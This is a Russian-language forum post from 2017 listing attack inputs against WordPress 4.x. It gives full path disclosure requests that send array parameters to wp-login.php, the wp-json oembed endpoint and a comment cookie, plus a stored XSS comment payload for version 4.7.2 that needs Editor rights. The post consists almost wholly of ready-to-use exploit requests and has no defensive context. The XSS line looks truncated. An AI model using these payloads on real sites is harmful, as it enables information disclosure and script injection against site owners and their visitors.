08.02.2017, 12:09
|
|
Участник форума
Регистрация: 20.04.2016
Сообщений: 185
С нами:
5297366
Репутация:
47
|
|
Wordpress 4.*.*
Full Path Disclosure
wordpress/wp-login.php
Код:
POST: log[]=1&pwd[]=1&redirect_to[]=
wp-json
Код:
GET: wordpress/wp-json/oembed/1.0/embed?format=xml&url[]=123
Код:
Cookie: comment_author_email_dbdee7661db32144cd2347d98b860504[]
Wordpress 4.7.2
Stored XSS
Привилегии: Редактор+
/wp/wp-comments-post.php
Код:
POST: comment=">alert('XSS');
|
|
|